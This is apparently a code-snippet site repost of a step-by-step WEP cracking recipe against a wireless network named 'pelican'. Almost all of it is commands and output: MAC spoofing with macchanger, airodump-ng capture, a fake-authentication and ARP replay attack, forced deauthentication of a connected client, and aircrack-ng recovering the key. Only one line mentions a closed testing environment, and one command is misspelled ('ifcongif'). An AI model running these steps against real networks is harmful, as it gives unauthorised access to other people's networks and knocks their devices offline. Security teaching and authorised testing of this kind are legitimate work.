首页 > 代码库 > WEP cracking
WEP cracking
Our information -
Wireless interface:
wlan0
Monitor mode interface: mon0
Spoofed MAC –
00:11:22:33:44:55
? DO NOT EVER USE THIS AS YOUR SPOOFED MAC ADDRESS OUTSIDE A CLOSED
TESTING ENVIRONMENT!
Target AP information -
ESSID: pelican
BSSID: 00:0F:66:39:7B:BD
CH:
6
STA:
00:22:FA:29:FA:58
Attack Setup
Spoof your wireless interface MAC address, enable monitor mode, and spoof its
MAC address.
# ifconfig wlan0 down
# macchanger -m 00:11:22:33:44:55 wlan0
# ifconfig wlan0 up
#
#
#
#
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifcongif mon0 up
Find your target
# airodump-ng mon0
? Let run until target AP has been found, then stop.
Reconfigure your monitor mode to match the target?s channel and re-spoof the
MAC address.
#
#
#
#
#
airmon-ng stop mon0
airmon-ng start wlan0 6
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Begin the Attack
# airodump-ng -c 6 --bssid 00:0F:66:39:7B:BD -w key mon0
? Let run.
Perform a Fake Authentication attack to associate with the AP.
Open a new terminal.
# aireplay-ng -1 0 -e pelican -a 00:0F:66:39:7B:BD -h 00:11:22:33:44:55 mon0
Begin the ARP Replay attack.
Open a new terminal.
# aireplay-ng -3 -b 00:0F:66:39:7B:BD -h 00:22:FA:29:FA:58 mon0
? Let run.
De-authenticate the connected STA.
Open a new terminal.
# aireplay-ng -0 1 -a 00:0F:66:39:7B:BD -c 00:22:FA:29:FA:58 mon0
? Harvest IVs.
Crack the Encryption
Open a new terminal.
# aircrack-ng key*.cap; killall aireplay-ng airodump-ng
KEY FOUND! [ 01:23:45:67:89 ]
The WEP network security key to ?pelican? is, ?0123456789?.